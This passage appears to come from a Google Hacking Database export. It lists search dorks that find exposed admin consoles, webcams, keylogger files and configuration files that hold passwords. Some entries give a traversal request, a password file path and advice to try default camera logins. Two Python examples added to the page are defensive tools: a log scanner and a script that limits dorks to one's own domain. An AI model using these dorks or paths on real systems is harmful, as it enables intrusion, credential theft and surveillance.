[descr]] [[url]http://www.google.com/search?q=intext:%22powered+by+Web+Wiz+Journal%22&hl=en&lr=&c2coff=1&start=10&sa=N[url]] [[dork]intext:"powered by Web Wiz Journal"[dork]] [end][893]] [[start][894] [[title]intitle:"vhost" intext:"vHost . 2000-2004"[title]] [[descr]vHost is a one-step solution for all virtual hosting needs. It enables a Linux/BSD server with single or multiple IP addresses to function as unlimited virtual hosts with HTTP, FTP, SMTP, POP3, IMAP, and other virtual services extendable via modules. It comes with both command-line and web-based graphical user interfaces, which give maximum control to a domain's owner, while relieving the system administrator of most routine administration tasks. [descr]] [[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22vhost%22+intext%3A%22vHost+.+2000-2004%22&btnG=Search[url]] [[dork]intitle:"vhost" intext:"vHost . 2000-2004"[dork]] [end][894]] [[start][895] [[title]allintext:"Powered by LionMax Software" "WWW File Share"[title]] [[descr]WWW File Share Pro is a small HTTP server that can help you share files with your friends. They can download files from your computer or upload files from theirs. Simply specify a directory for downloads and a directory for uploads.
All servers can be accessed anonymously.[descr]] [[url]http://www.google.com/search?hl=en&c2coff=1&q=allintext%3A%22Powered+by+LionMax+Software%22+%22WWW+File+Share%22&btnG=Zoeken&lr=[url]] [[dork]allintext:"Powered by LionMax Software" "WWW File Share"[dork]] [end][895]] [[start][896] [[title]inurl:":631/printers" -php -demo[title]] [[descr]CUPS provides a portable printing layer for UNIX®-based operating systems. It has been developed by Easy Software Products to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. CUPS uses the Internet Printing Protocol ("IPP") as the basis for managing print jobs and queues. The Line Printer Daemon ("LPD"), Server Message Block ("SMB"), and AppSocket (a.k.a. JetDirect) protocols are also supported. The search finds CUPS web interfaces on port 631 that are reachable from the Internet; the /printers page lists every configured queue.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&q=inurl%3A%22%3A631%2Fprinters%22+-php+-demo&btnG=Search[url]] [[dork]inurl:":631/printers" -php -demo[dork]] [end][896]] [[start][897] [[title]ext:dat bpk.dat[[title]] [[descr]Perfect Keylogger is, as the name says, a keylogger :)
This dork finds the corresponding data files, which can be read with the free downloadable lite version.[descr]] [[url]http://www.google.com/search?q=ext:dat+bpk.dat&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]] [[dork]ext:dat bpk.dat[dork]] [end][897]] [[start][898] [[title]intitle:"iVISTA.Main.Page"[title]] [[descr]Yet another webcam search. Most of these cams seem to be security cams.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22iVISTA.Main.Page%22&sourceid=firefox&start=0&start=0&ie=utf-8&oe=utf-8[url]] [[dork]intitle:"iVISTA.Main.Page"[dork]] [end][898]] [[start][899] [[title]inurl:2506/jana-admin[[title]] [[descr]The JanaServer 2 is, among other things, a proxy server that lets LAN members (everyone, or a defined group) access the Internet via a modem, ISDN or DSL connection. The program must be installed on the computer that has the modem, ISDN or DSL adapter. The dork finds its web administration interface on port 2506.[descr]] [[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=inurl%3A2506%2Fjana-admin+&btnG=Search[url]] [[dork]inurl:2506/jana-admin [dork]] [end][899]] [[start][900] [[title]intitle:"Spam Firewall" inurl:"8000/cgi-bin/index.cgi"[title]] [[descr]The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and viruses from your organization. 
[descr]] [[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22Spam+Firewall%22+inurl%3A%228000%2Fcgi-bin%2Findex.cgi%22&btnG=Search[url]] [[dork]intitle:"Spam Firewall" inurl:"8000/cgi-bin/index.cgi"[dork]] [end][900]] [[start][901] [[title]inurl:ds.py[[title]] [[descr]Affordable Web-based document and content management application that lets businesses of every size rapidly deploy a world-class Enterprise Content Management (ECM) solution to help reduce costs, optimize information flow, and reduce risk.[descr]] [[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=inurl%3Ads.py&btnG=Search[url]] [[dork]inurl:ds.py[dork]] [end][901]] [[start][902] [[title]inurl:"1220/parse_xml.cgi?"[title]] [[descr]QuickTime Streaming Server is, well, a streaming server, and it can be managed via HTTP; the dork matches its web admin interface on port 1220. No need to say more.
Darwin Streaming Server is the open-source version (for *nix OSes).

Some are password-protected, others are not.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%221220%2Fparse_xml%22[url]] [[dork]inurl:"1220/parse_xml"[dork]] [end][902]] [[start][903] [[title]intitle:"MX Control Console" "If you can't remember"[title]] [[descr]MX Logic’s customizable and easy-to-use MX Control ConsoleSM is a centralized email threat management policy platform that provides you with one interface for managing all corporate-wide email threats, protection and security. With the MX Control Console, you can easily configure and control your email protection and security based on your overall corporate email policies. [descr]] [[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22MX+Control+Console%22+%22If+you+can%27t+remember%22&btnG=Search[url]] [[dork]intitle:"MX Control Console" "If you can't remember"[dork]] [end][903]] [[start][904] [[title]intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm[[title]] [[descr]See and control JVC webcams: you can move the camera, zoom, change the settings, etc.[descr]] [[url]http://www.google.com/search?q=intext%3A%22Welcome+to+the+Web+V.Networks%22+intitle%3A%22V.Networks+%5BTop%5D%22+-filetype%3Ahtm+[url]] [[dork]intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm [dork]] [end][904]] [[start][905] [[title]intitle:"WebLogic Server" intitle:"Console Login" inurl:console[[title]] [[descr]BEA WebLogic Server 8.1 provides an industrial-strength application infrastructure for developing, integrating, securing, and managing distributed service-oriented applications. By simplifying and unifying the enterprise infrastructure, IT organizations can now deliver greater value in less time, at reduced cost to the overall business. The search finds the administration console login page (/console) exposed to the Internet. 
[descr]] [[url]http://www.google.com/search?q=intitle:%22WebLogic+Server%22+intitle:%22Console+Login%22+inurl:console[url]] [[dork]intitle:"WebLogic Server" intitle:"Console Login" inurl:console[dork]] [end][905]] [[start][906] [[title]ext:conf inurl:rsyncd.conf -cvs -man[[title]] [[descr]rsync is an open source utility that provides fast incremental file transfer.
rsync can also talk to "rsync servers" which can provide anonymous or authenticated rsync.
The configuration files contain data about peers and paths: module names, the directories they export, hosts allow lists and the location of the secrets file.[descr]] [[url]http://www.google.com/search?q=ext:conf+inurl:rsyncd.conf+-cvs+-man&hl=en&lr=&filter=0[url]] [[dork]ext:conf inurl:rsyncd.conf -cvs -man[dork]] [end][906]] [[start][907] [[title]inurl:"phpOracleAdmin/php" -download -cvs[[title]] [[descr]phpOracleAdmin is intended to be a web-based Oracle object manager.
In many respects similar to phpMyAdmin, it aims to offer more comfort and possibilities. Interestingly, the managers this search finds are not password-protected.[descr]] [[url]http://www.google.com/search?q=inurl%3A%22phpOracleAdmin%2Fphp%22+-download+-cvs[url]] [[dork]inurl:"phpOracleAdmin/php" -download -cvs[dork]] [end][907]] [[start][908] [[title]inurl:1810 "Oracle Enterprise Manager"[title]] [[descr]Enterprise Manager 10g Grid Control provides a single tool that can monitor and manage not only every Oracle software element in your grid, but also Web applications, hosts, and the network in between. Grid Control is also extensible via an SDK so customers can use it to monitor additional components that are not supported out of the box.[descr]] [[url]http://www.google.com/search?q=inurl%3A1810+%22Oracle+Enterprise+Manager%22[url]] [[dork]inurl:1810 "Oracle Enterprise Manager"[dork]] [end][908]] [[start][909] [[title]"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )[[title]] [[descr]Invision Power File Manager is a popular file management script, written in the popular PHP scripting language. It is compatible with all forms of Unix and Windows and allows the user to control their files via any modern browser.[descr]] [[url]http://www.google.com/search?q=%22Powered+by+Invision+Power+File+Manager%22+%28inurl%3Alogin.php%29+%7C+%28intitle%3A%22Browsing+directory+%2F%22+%29+&btnG=Search[url]] [[dork]"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" ) [dork]] [end][909]] [[start][910] [[title]intitle:"Novell Web Services" intext:"Select a service and a language."[title]] [[descr]"Novell® GroupWise is an enterprise collaboration system that provides secure e-mail, calendaring, scheduling, and instant messaging. GroupWise also includes task management, contact management, document management, and other productivity tools. 
GroupWise can be used on your desktop on Linux, Windows*, or Macintosh; in a Web browser anywhere you have an Internet connection; and even on wireless devices. Your GroupWise system can be set up on NetWare®, Linux, Windows, or any combination of these operating systems." [descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][910]] [[start][911] [[title]ext:php intext:"Powered by phpNewMan Version"[title]] [[descr]PHP News Manager is a multi-platform compatible solution for managing websites and multi-user access. Features weekly poll management, gallery management, partners list management, public news support, and a lot more. PHP News Manager is vulnerable to a directory traversal problem.

path/to/news/browse.php?clang=../../../../../../file/i/want
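The clang=../../ request shown above leaves an unmistakable trace in the web server's access log, and the same check catches traversal attempts against any other parameter. The following Python is an added example for this page, not part of the GHDB entry and not phpNewMan's own code: it scans Apache combined-format log lines (constructed here, not real traffic) for query parameters that still contain a ../ or ..\ segment after percent-decoding, including double-encoded variants, and tallies attempts per client. The regexes, field names and IP addresses are this example's own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-format log lines (not real traffic): one benign
# request, three traversal attempts against the browse.php clang parameter
# (plain, URL-encoded and double-encoded), and an unrelated static file.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2005:10:01:02 +0000] "GET /news/browse.php?clang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2005:10:01:09 +0000] "GET /news/browse.php?clang=../../../../../../etc/passwd HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Mar/2005:10:02:11 +0000] "GET /news/browse.php?clang=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1830 "-" "curl/7.12"
198.51.100.4 - - [12/Mar/2005:10:02:15 +0000] "GET /news/browse.php?clang=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 512 "-" "curl/7.12"
192.0.2.9 - - [12/Mar/2005:10:03:00 +0000] "GET /images/logo.gif HTTP/1.1" 200 2048 "http://example.net/" "Mozilla/4.0"
"""

# Fields of a combined-format line that matter here: client IP, timestamp,
# method, request target and response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A ".." path segment delimited by / or \ (or sitting at either end of the value).
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded %252e%252e%252f is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_params(target):
    """Return [(name, decoded_value)] for query parameters carrying a ../ or ..\\ sequence."""
    query = urlsplit(target).query
    hits = []
    for name, raw in parse_qsl(query, keep_blank_values=True):  # parse_qsl decodes once
        value = fully_decode(raw)
        if TRAVERSAL_RE.search(value):
            hits.append((name, value))
    return hits


def scan_log(text):
    """Return one dict per request whose query string contains a traversal sequence."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in traversal_params(m.group("target")):
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "path": urlsplit(m.group("target")).path,
                "param": name,
                "value": value,
                # A 200 means the script handed something back; check which file that was.
                "served": m.group("status") == "200",
            })
    return findings


def offenders(findings):
    """Count traversal attempts per client IP."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} {f['param']}={f['value']} "
              f"status={f['status']} served={f['served']}")
    print(offenders(scan_log(SAMPLE_LOG)))
```

Run it on a real file with scan_log(open("access.log").read()). A 200 response to such a request only tells you the script returned something; whether that was the requested file or an error page is what to verify next, and a second decoding round is deliberately included because a single unquote() misses the %252e form.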
[descr]] [[url]http://www.google.com/search?q=ext:php+intext:%22Powered+by+phpNewMan+Version%22+[url]] [[dork]ext:php intext:"Powered by phpNewMan Version" [dork]] [end][911]] [[start][912] [[title]intitle:"Cayman-DSL.home"[title]] [[descr]Cayman DSL modems. Many Cayman units have a weakness where, even if remote administration is disabled, some older firmware versions will still accept a login if the proper credentials are supplied. In many cases, simply hitting Enter will be enough to authenticate. It's worth noting that many of the vulnerable devices also support telnet right out of the box, as opposed to the Linksys models, which require a firmware patch.
[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Cayman-DSL.home%22&btnG=Search[url]] [[dork]intitle:"Cayman-DSL.home"[dork]] [end][912]] [[start][913] [[title]intitle:"Index of /CFIDE/" administrator[[title]] [[descr]With ColdFusion, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP.
This search pulls up directory listings of /CFIDE/ that we probably shouldn't be seeing; entering the 'administrator' directory brings up the ColdFusion Administrator login screen.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Index+of+%2FCFIDE%2F%22+administrator&btnG=Search[url]] [[dork]intitle:"Index of /CFIDE/" administrator[dork]] [end][913]] [[start][914] [[title]intitle:"Athens Authentication Point"[title]] [[descr]Athens is an access management system for controlling access to web-based subscription services. It offers:

* secure single username access to multiple web-based access controlled services
* devolved administration facilities at organisation level
* remote access user accounts
* encrypted account bulk upload facilities
* scalable services with 3 million accounts
* replication facilities at several separate physical locations, offering a resilient authentication service [descr]] [[url]http://www.google.com/search?q=intitle%3A%22Athens+Authentication+Point%22&btnG=Search[url]] [[dork]intitle:"Athens Authentication Point"[dork]] [end][914]] [[start][915] [[title]ext:ini eudora.ini[[title]] [[descr]This is the configuration file for the Eudora mail client; it may contain sensitive information such as POP server names, logins and sometimes encrypted passwords.[descr]] [[url]http://www.google.com/search?q=ext:ini+eudora.ini&hl=en&lr=&filter=0[url]] [[dork]ext:ini eudora.ini[dork]] [end][915]] [[start][916] [[title]inurl:preferences.ini "emule]"[title]] [[descr]This finds the eMule configuration file, which contains some general and proxy information.
Sometimes the proxy username and password are stored as well.[descr]] [[url]http://www.google.com/search?q=inurl%3Apreferences.ini+%22%5Bemule%5D%22[url]] [[dork]inurl:preferences.ini "[emule]"[dork]] [end][916]] [[start][917] [[title]intitle:index.of abyss.conf[[title]] [[descr]These directory listings reveal the configuration file of the Abyss web server. These files can contain passwords.[descr]] [[url]http://www.google.com/search?q=intitle%3Aindex.of+abyss.conf[url]] [[dork]intitle:index.of abyss.conf[dork]] [end][917]] [[start][918] [[title]ext:php program_listing intitle:MythWeb.Program.Listing[[title]] [[descr]MythTV is a homebrew PVR project that I've been working on in my spare time. It's been under heavy development for two years, and is now quite usable and featureful.[descr]] [[url]http://www.google.com/search?q=ext:php+program_listing+intitle:MythWeb.Program.Listing[url]] [[dork]ext:php program_listing intitle:MythWeb.Program.Listing[dork]] [end][918]] [[start][919] [[title]intitle:Login intext:"RT is © Copyright"[title]] [[descr]RT is an enterprise-grade ticketing system which enables a group of people to intelligently and efficiently manage tasks, issues, and requests submitted by a community of users.
Versions including 2.0.13 are vulnerable to injection; see

SecurityFocus BID 7509[descr]] [[url]http://www.google.com/search?q=intitle%3ALogin+intext%3A%22RT+is+%C2%A9+Copyright%22&btnG=Search[url]] [[dork]intitle:Login intext:"RT is © Copyright"[dork]] [end][919]] [[start][920] [[title]intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"[title]] [[descr]BiTBOARD v2.0 is a bulletin board that needs no database to work, so it is useful for webmasters who have no access to an SQL database.
The password file can be retrieved directly from
/admin/data_passwd.dat[descr]] [[url]http://www.google.com/search?&q=intext%3A%22%22BiTBOARD+v2.0%22+BiTSHiFTERS+Bulletin+Board%22[url]] [[dork]intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"[dork]] [end][920]] [[start][921] [[title]intitle:"welcome.to.squeezebox"[title]] [[descr]Squeezebox is the easiest way for music lovers to enjoy high-quality playback of their whole digital music collection. Stream music from your computer to anywhere in your home. Works with iTunes and provides a powerful web interface for control from any computer on your network.

This is neat: on top of giving out all sorts of enumeration information, it also allows one to peruse the music collection on the box, as well as listen if you install the applet. Way cool.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22welcome.to.squeezebox%22+[url]] [[dork]intitle:"welcome.to.squeezebox" [dork]] [end][921]] [[start][931] [[title][[title]] [[descr]
Some of the sites are very, very interesting - try a search substituting site:gov instead of site:com, or try site:edu or site:org or site:fm. Anyway, camera servers made by Axis Video, you can look up administrator manuals online via the following search string (guess what you might find there?):

site:com inurl:axis video server manuals

Can you say default UID and PW?

What's really interesting is if you look hard enough; you can find cameras within government and educational labs; airport surveillance; even some stretches of I65 in the US (for those of you close to the Ohio River area).

Anyway this search string gets you into the server; from there you can have many controls or few controls over the cameras (including zoom, pan, and iris). There is much to see and most of the cameras have easy access to the admin profile via click of a button - of course from there you have to provide a UID & PW. But read up on the manuals and you may get lucky.

Bottom line, if you can control the camera (via admin priv.) you can control what and when the camera & server view as well as what & when they record. Just a small seed for a possibly big idea - your ambitions may vary.

Rate it! Give me feedback! I will not learn without some form of criticism...yet despite how insignificant that criticism may make me feel...I enjoy the search for the unseen/unknown knowledge nonetheless...it was worth it.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][931]] [[start][933] [[title]allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"[title]] [[descr]FrontPage Extensions for Unix? So be it.[descr]] [[url]http://www.google.com/search?num=100&q=allinurl%3A%22%2F*%2F_vti_pvt%2F%22+%7C+allinurl%3A%22%2F*%2F_vti_cnf%2F%22[url]] [[dork]allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"[dork]] [end][933]] [[start][934] [[title]filetype:cnf inurl:_vti_pvt access.cnf[[title]] [[descr]The access.cnf file is a "weconfigfile" (webconfig file) used by FrontPage Extensions for Unix. The install script called change_server.sh processes them. These files leak the realm name and the full path on the server for it. [descr]] [[url]http://www.google.com/search?num=100&q=filetype%3Acnf+inurl%3A_vti_pvt+access.cnf[url]] [[dork]filetype:cnf inurl:_vti_pvt access.cnf[dork]] [end][934]] [[start][935] [[title]inurl:"install/install.php"[title]] [[descr]This searches for the install.php file. Most results will be bulletin boards like phpBB.

This will let an attacker install the forum again. There is an exploit available on the Net which lets you see DB info.[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=inurl%3A%22install%2Finstall.php%22[url]] [[dork]inurl:"install/install.php"[dork]] [end][935]] [[start][936] [[title]intitle:"index of" inurl:ftp (pub | incoming)[[title]] [[descr]Adding "inurl:ftp (pub | incoming)" to the "index.of" searches helps locating ftp websites. This query can easily be narrowed further with additional keywords.
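Narrowing a query is also how this database is used defensively: take each dork and restrict it to your own domain with a site: term, then review what the engine has indexed. The following Python is an added example for this page, not part of the GHDB or of any project it lists: it parses the record format used throughout this file (the constructed excerpt copies four of the page's own records, including the empty placeholder 878), strips any existing positive site: term while keeping -site: exclusions, and builds the same style of Google URL the entries store. The helper names and the example.com domain are this example's own assumptions.

```python
import re
from urllib.parse import urlencode

# Constructed excerpt in the GHDB.TXT record format used on this page (four
# records copied from it, including the empty placeholder record 878).
SAMPLE_GHDB = (
    '[[start][878] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] '
    '[[dork][dork]] [end][878]] '
    '[[start][881] [[title]intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org[[title]] '
    '[[descr]This search uses desktop.ini to find users with a web server running on their desktop computers.[descr]] '
    '[[url]http://www.google.com/search?hl=en&q=intitle%3A%22index+of%22+site%3Adyndns.org[url]] '
    '[[dork]intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org[dork]] [end][881]] '
    '[[start][906] [[title]ext:conf inurl:rsyncd.conf -cvs -man[[title]] [[descr]rsync is an open source utility.\n'
    'The configuration files contain data about peers and paths[descr]] '
    '[[url]http://www.google.com/search?q=ext:conf+inurl:rsyncd.conf+-cvs+-man[url]] '
    '[[dork]ext:conf inurl:rsyncd.conf -cvs -man[dork]] [end][906]] '
    '[[start][871] [[title]intext:"MaiLinX Alert (Notify)" -site:networkprinters.com[[title]] '
    '[[descr]Xerox DocuPrint printer models.[descr]] [[url]http://www.google.com/[url]] '
    '[[dork]intext:"MaiLinX Alert (Notify)" -site:networkprinters.com[dork]] [end][871]]'
)

# One record: [[start][N] [[title]...[[title]] [[descr]...[descr]] [[url]...[url]]
# [[dork]...[dork]] [end][N]].  The file is inconsistent about the title
# terminator ([[title]] vs [title]]) and occasionally drops the bracket before
# descr]], so both spellings are accepted; the closing id must match the opener.
RECORD_RE = re.compile(
    r'\[\[start\]\[(?P<id>\d+)\]\s*'
    r'\[\[title\](?P<title>.*?)\[\[?title\]\]\s*'
    r'\[\[descr\](?P<descr>.*?)\[?descr\]\]\s*'
    r'\[\[url\](?P<url>.*?)\[url\]\]\s*'
    r'\[\[dork\](?P<dork>.*?)\[dork\]\]\s*'
    r'\[end\]\[(?P=id)\]\]',
    re.DOTALL,
)

# A positive site: term (not -site:, and not glued to another operator).
SITE_TERM_RE = re.compile(r'(?<![\w:-])site:\S+')


def parse_ghdb(text):
    """Parse GHDB.TXT records into dicts with id, title, descr, url and dork."""
    records = []
    for m in RECORD_RE.finditer(text):
        d = m.groupdict()
        d["id"] = int(d["id"])
        for key in ("title", "descr", "url", "dork"):
            d[key] = d[key].strip()
        records.append(d)
    return records


def usable_dorks(records):
    """Drop placeholder records that carry no search string."""
    return [r for r in records if r["dork"]]


def scope_dork(dork, domain):
    """Restrict a dork to one domain: replace any positive site: term, keep -site: exclusions."""
    stripped = SITE_TERM_RE.sub("", dork)
    return " ".join(stripped.split()) + f" site:{domain}"


def search_url(dork):
    """Build the same style of Google URL the database stores for each entry."""
    return "http://www.google.com/search?" + urlencode({"q": dork})


def audit_queries(text, domain):
    """Every usable dork in the file, scoped to domain, as (id, scoped_dork, url)."""
    result = []
    for r in usable_dorks(parse_ghdb(text)):
        scoped = scope_dork(r["dork"], domain)
        result.append((r["id"], scoped, search_url(scoped)))
    return result


if __name__ == "__main__":
    for rec_id, dork, url in audit_queries(SAMPLE_GHDB, "example.com"):
        print(rec_id, dork)
        print("   ", url)
```

Feed the whole file with audit_queries(open("GHDB.TXT", encoding="latin-1").read(), "yourdomain.example") and work through the resulting URLs by hand; the point of keeping -site: exclusions is that they are part of the dork's false-positive filtering, while a positive site: from the original submitter (as in record 881) would otherwise pin the search to someone else's domain.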
[descr]] [[url]http://www.google.com/search?q=intitle%3A%22index+of%22+inurl%3Aftp+%28pub+%7C+incoming%29[url]] [[dork]intitle:"index of" inurl:ftp (pub | incoming)[dork]] [end][936]] [[start][937] [[title]filetype:blt "buddylist"[title]] [[descr]AIM buddy lists.[descr]] [[url]http://www.google.com/search?hl=en&q=filetype%3Ablt+%22buddylist%22[url]] [[dork]filetype:blt "buddylist"[dork]] [end][937]] [[start][938] [[title]intitle:"index.of" .diz .nfo last modified[[title]] [[descr]File_id.diz is a description file uploaders use to describe packages uploaded to FTP sites. Although rooted in legitimacy, it is used largely by software piracy groups to describe their ill-gotten goods. Systems administrators finding file_id.diz in directory listings on their servers may discover their boxes have been hacked and are being used as a distribution site for pirated software.

.nfo's often contain info on which piracy group the files have passed through on their way to their final resting place. This helps weed out false positives.
[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][938]] [[start][939] [[title]intitle:"Sipura.SPA.Configuration" -.pdf[[title]] [[descr]The query returns configuration pages of Internet-facing Sipura SPA Voice over IP devices. They disclose an obscene amount of information about the target, including almost all call-routing information, and give access to control the user's telephone system.[descr]] [[url]http://www.google.com/search?q=intitle:%22Sipura.SPA.Configuration%22+-.pdf&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intitle:"Sipura.SPA.Configuration" -.pdf[dork]] [end][939]] [[start][940] [[title]intitle:"Azureus : Java BitTorrent Client Tracker"[title]] [[descr]This query shows machines using the Azureus BitTorrent client's built-in tracker - the pages are quite simple in the information they give out, simply a list of active torrents.

This information may be useful for people wanting to find active BitTorrent trackers for downloading .torrent files from, or for people wanting to find these trackers to shut them down :) [descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22Azureus+%3A+Java+BitTorrent+Client+Tracker%22&btnG=Google+Search[url]] [[dork]intitle:"Azureus : Java BitTorrent Client Tracker"[dork]] [end][940]] [[start][941] [[title]intitle:"BNBT Tracker Info"[title]] [[descr]This query shows pages which summarise activity on BNBT-powered BitTorrent trackers - including all the torrents currently being "tracked", the BNBT software version, links to user-lists and 'admin' pages, etc.

This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. Some versions of BNBT are also vulnerable to a DoS attack. People targeting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful![descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22BNBT+Tracker+Info%22&btnG=Google+Search[url]] [[dork]intitle:"BNBT Tracker Info"[dork]] [end][941]] [[start][942] [[title]intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"[title]] [[descr]This query shows pages which summarise activity on PHPBT-powered BitTorrent trackers - all the torrents currently being "tracked".

This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. People targeting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!

Often, the URL involved can be changed to reach the configuration, installation or deletion scripts, which are obviously *not* intended for public access, even if the statistics page is.[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22PHPBTTracker+Statistics%22+%7C+intitle%3A%22PHPBT+Tracker+Statistics%22&btnG=Google+Search[url]] [[dork]intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"[dork]] [end][942]] [[start][943] [[title]"Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq[[title]] [[descr]Query: "Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq

Background: WordPress is blogging software; the versions current at the time were vulnerable to a few SQL injection issues.
http://securityfocus.com/bid/12066/exploit/[descr]] [[url]http://www.google.com/search?hl=en&q=%22Powered+by+WordPress%22+-html+filetype%3Aphp+-demo+-wordpress.org+-bugtraq&btnG=Google+Search[url]] [[dork]"Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq[dork]] [end][943]] [[start][944] [[title]intitle:upload inurl:upload intext:upload -forum -shop -support -w3c[[title]] [[descr]The search reveals server upload portals.

An attacker can use the server's space for his own purposes.[descr]] [[url]http://www.google.com/search?q=intitle%3Aupload+inurl%3Aupload+intext%3Aupload+-forum+-shop+-support+-w3c+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en[url]] [[dork]intitle:upload inurl:upload intext:upload -forum -shop -support -w3c [dork]] [end][944]] [[start][947] [[title]intitle:"SpeedStream * Management Interface"[title]] [[descr]A lot of SpeedStream routers :)[descr]] [[url]http://www.google.com/search?q=intitle%3A%22SpeedStream+*+Management+Interface%22&btnG=Search[url]] [[dork]intitle:"SpeedStream * Management Interface"[dork]] [end][947]] [[start][948] [[title]intitle:"HFS /" +"HttpFileServer"[title]] [[descr]"The HttpFileServer is a Java based mechanism for providing web access to a set of files on a server. This is very similar to Apache Directory Indexing but provides the ability to upload files as well."

http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=1516[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][948]] [[start][950] [[title]inurl:"next_file=main_fs.htm" inurl:img inurl:image.cgi[[title]] [[descr]Linksys Wireless-G web cams.[descr]] [[url]http://www.google.com/search?q=inurl:%22next_file=main_fs.htm%22+inurl:img+inurl:image.cgi[url]] [[dork]inurl:"next_file=main_fs.htm" inurl:img inurl:image.cgi[dork]] [end][950]] [[start][951] [[title]"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row[[title]] [[descr]This is a more specific search for the vulnerable PhpNuke index already seen on this website.

PhpNuke asks you to set up an admin account when it is first installed. This search is a list of people who never set up that account! It will take you directly to the administrator registration of a vulnerable server. The -mysql_fetch_row will remove listings where SQL is simply broken.[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=%22There+are+no+Administrators+Accounts%22+inurl%3Aadmin.php+-mysql_fetch_row[url]] [[dork]"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row[dork]] [end][951]] [[start][954] [[title]filetype:ctt Contact[[title]] [[descr]This is for MSN contact lists...[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=filetype%3Actt+Contact&btnG=Search[url]] [[dork]filetype:ctt Contact[dork]] [end][954]] [[start][955] [[title]People's MSN contact lists[[title]] [[descr]This will give MSN contact lists; modify the "msn" to whatever you feel is messenger-related.[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=filetype%3Actt+%22msn%22&btnG=Search[url]] [[dork]filetype:ctt "msn"[dork]] [end][955]] [[start][957] [[title]inurl:servlet/webacc[[title]] [[descr]I was playing around on the net when I found a small problem with Novell's WebAccess. With User.lang you can give your language as a parameter. I tried some different stuff there, and when I tried "> so that the URL would be 